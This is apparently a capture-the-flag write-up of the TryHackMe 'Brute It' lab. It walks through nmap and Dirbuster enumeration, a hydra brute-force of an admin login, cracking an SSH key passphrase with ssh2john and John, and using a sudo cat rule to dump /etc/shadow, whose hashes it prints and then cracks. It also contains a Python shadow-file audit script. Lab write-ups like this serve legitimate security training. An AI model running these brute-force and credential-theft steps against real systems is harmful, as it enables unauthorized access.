Brute It is an easy TryHackMe room that focuses on basic enumeration, hash-cracking and privilege escalation concepts. This is a free room, which means anyone can deploy virtual machines in the room (without being subscribed)!
Room Link: https://tryhackme.com/room/bruteit
nmap -sC -sV -vv -Pn [IP]
This basic Nmap command will pretty much find everything we need in this room. As you can see, there are 2 ports open, port 22 and port 80, and the scan shows the versions of both services running on them. Simply exploring the web page doesn't get you anywhere interesting, so let's look for more directories on port 80. For this, Dirbuster is always an easy and simple method; its default wordlist can find most common directories.
It shows a directory IP/admin is running on the webserver. Browsing to this page gives us a simple admin login page having a simple form.
Looking through the source of this page reveals a careless mistake by the web developer: he left a note for john stating what the admin username is. This obviously saved us a lot of time.
OK, so now we have the admin username and a form where this username is used for logins. Let's try hydra to brute-force the password.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.119.208 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password"
With the brute-forced password we can now log into the admin page and grab the first flag.
Here’s an RSA key just waiting for us after getting the initial access.
Save this RSA key into a new text file, rsa_key.txt. ssh2john converts the encrypted key into a hash that John can then crack to recover the passphrase.
/usr/share/john/ssh2john.py rsa_key.txt > hash
I now have the passphrase for the id_rsa. Before I log in, I have to restrict the permissions of the key file, or ssh will refuse to use it.
chmod 600 rsa_key.txt
Now I can SSH in as john using the id_rsa and its passphrase. The username john is a guess, since the note we found earlier indicated this was john's RSA key.
Grab the user flag as well.
Basic enumeration with sudo -l shows that the user john is allowed to run the following command as root:
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
Without doing anything fancy, let's read /etc/shadow, the file that stores the password hashes of all local Linux users.
Let's try to view the password hashes: sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::
We can see the hashed password for the root user. Put that hash in a new file, root_hash.txt, and let's try to crack it with a wordlist.
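As an added example, not part of the original writeup: a small Python audit that parses /etc/shadow-format lines like the dump above and reports which accounts carry a crackable hash, which hashing scheme it uses, and when the password was last changed. SAMPLE_SHADOW is a constructed sample with placeholder hashes, and the function names are my own.

```python
from datetime import date, timedelta

# Constructed sample in /etc/shadow format (same layout as the dump above).
# The hashes are placeholders, not real crypt output; only the fields matter.
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDER_ROOT_HASH:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
thm:$6$saltsalt$PLACEHOLDER_THM_HASH:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$saltsalt$PLACEHOLDER_JOHN_HASH:18490:0:99999:7:::
legacy:$1$saltsalt$PLACEHOLDER_MD5_HASH:15000:0:99999:7:::
guest::18490:0:99999:7:::
"""

# crypt(3) "$id$" prefixes mapped to the hashing scheme they denote.
HASH_ALGOS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}

def parse_shadow(text):
    """Parse shadow-format lines into dicts: user, status, algo, last change date."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        user, pw, lastchg = fields[0], fields[1], fields[2]
        if pw == "":
            status = "empty"    # no password is required to log in
        elif pw[0] in "*!":
            status = "locked"   # '*', '!' or '!<hash>': password auth disabled
        else:
            status = "hashed"   # a real hash that a cracker could be fed
        algo = HASH_ALGOS.get(pw.split("$")[1], "unknown") if pw.startswith("$") else None
        changed = (date(1970, 1, 1) + timedelta(days=int(lastchg))).isoformat() if lastchg else None
        entries.append({"user": user, "status": status, "algo": algo, "changed": changed})
    return entries

def exposed_accounts(text):
    """Users whose hash leaks if /etc/shadow becomes readable (e.g. via a sudo cat rule)."""
    return [e["user"] for e in parse_shadow(text) if e["status"] == "hashed"]

def weak_accounts(text):
    """Users with no password or a fast legacy hash; these fall to a wordlist first."""
    return [e["user"] for e in parse_shadow(text)
            if e["status"] == "empty"
            or (e["status"] == "hashed" and e["algo"] in ("md5crypt", "unknown"))]
```

Run it against a real file with parse_shadow(open("/etc/shadow").read()) as root; on a hardened host only accounts that genuinely need password login should show up in exposed_accounts, and weak_accounts should be empty.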
john --wordlist=/usr/share/wordlists/rockyou.txt root_hash.txt
And now we have the password for the root user. Let's escalate our privileges to root.
su root
Password:
/home/john#
And finally, we have the final flag as well.